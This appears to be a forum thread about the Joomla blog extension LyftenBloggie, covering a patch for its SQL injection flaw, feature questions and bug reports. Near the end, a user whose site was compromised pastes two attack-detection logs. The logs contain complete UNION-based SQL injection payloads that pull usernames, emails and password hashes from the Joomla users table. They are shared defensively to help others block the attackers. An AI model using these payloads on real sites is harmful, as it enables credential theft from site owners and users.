I'm so sorry everyone, I have been super busy. I'll have a new version of my site and LyftenBloggie out soon. I have a lot of emails and forum comments to go through right now.

As for the LyftenBloggie Remote SQL injection vulnerability problem, here is a patch:

http://www.lyften.com/products/lyftenbloggie/extensions/download/id-20.html

Hope everyone is having a great holiday!

 -Daniel

Cool, this is an EXCELLENT extension!

Please look, now contains a French translation :

http://www.joomlafrance.org/telecharger/fileinfo/Lyften_Bloggie.html

Can you add translation file ?

 Thanks!

Welcome back!!!

Regarding the new version, will the commenting system be improved? That was the only thing that stopped me using it for a client site when I tried it before. My memory is a bit faded now but I remember having to click add comment then had to click add comment again (I think the 2nd add comment link was on the right of the screen).

UPDATE: Weird...I've just installed the blog again and the comments seem to be working and look different (better) than the last time I tried it. So please ignore my stupid question about comments ;)

And I'm not chasing or anything but do you think the new version will be out by the end of Jan? (I have a couple of sites which I'd love to use this blog on but I have a deadline of end of Jan). Not a big deal :)

Thanks again for continue to work on this great extension.

Cheers,

Bob.

Great hope you fix all the problem people have with getting all the modules to work. The only one I can get to work is the category module.

I also have a problem bcs users cant delete their blogs in front end..that must be a bug?

rgds

Im really sad that i read this post too late my entire site was exploited due this vulnerability. I think that this is a great add to any joomla site but lacks of support.

but in the other hand i think the ppl will be more motivated to donate and support this project if they see more updates coming and good support.

dont get me wrong im just expressing how i feel

This is how it look like. So now you can blacklist turkish ip no 94.120.216.37.

There was attack of typeSQL injection discovered on your site.
 
Additional Information:
---------------------------------------------
 TYPE:     SQL injection
 IP:       94.120.216.37
 USER:     [0] 
 REFERER:  
 GET:      Array
(
    [option] => com_lyftenbloggie
    [author] => <b>62 union select 1,concat_ws(0x3a,username,0x3a,email,0x3a,activation),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from jos_users--</b>
)
 
 POST:     Array
(
    [author] => <b>62 union select 1,concat_ws(0x3a,username,0x3a,email,0x3a,activation),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from jos_users--</b>
)
 
 COOCKIE:  Array
(
    [7f6d0e09275fb84130aae261eba5cc6f] => c7f8ba95d2229a3a649ac118f08ebc5e
    [author] => <b>62 union select 1,concat_ws(0x3a,username,0x3a,email,0x3a,activation),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from jos_users--</b>
)

This is another..

Additional Information:
---------------------------------------------
 TYPE:     SQL injection
 IP:       109.72.61.219
 USER:     [0] 
 REFERER:  
 GET:      Array
(
    [option] => com_lyftenbloggie
    [author] => <b>62 union select 1,concat_ws(0x3a,username,password),1,1,@@version,666,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from jos_users--</b>
)
 
 POST:     Array
(
    [author] => <b>62 union select 1,concat_ws(0x3a,username,password),1,1,@@version,666,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from jos_users--</b>
)
 
 COOCKIE:  Array
(
    [7f6d0e09275fb84130aae261eba5cc6f] => f705c8fff6db011ed1f3e1dd18d227a7
    [author] => <b>62 union select 1,concat_ws(0x3a,username,password),1,1,@@version,666,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from jos_users--</b>
)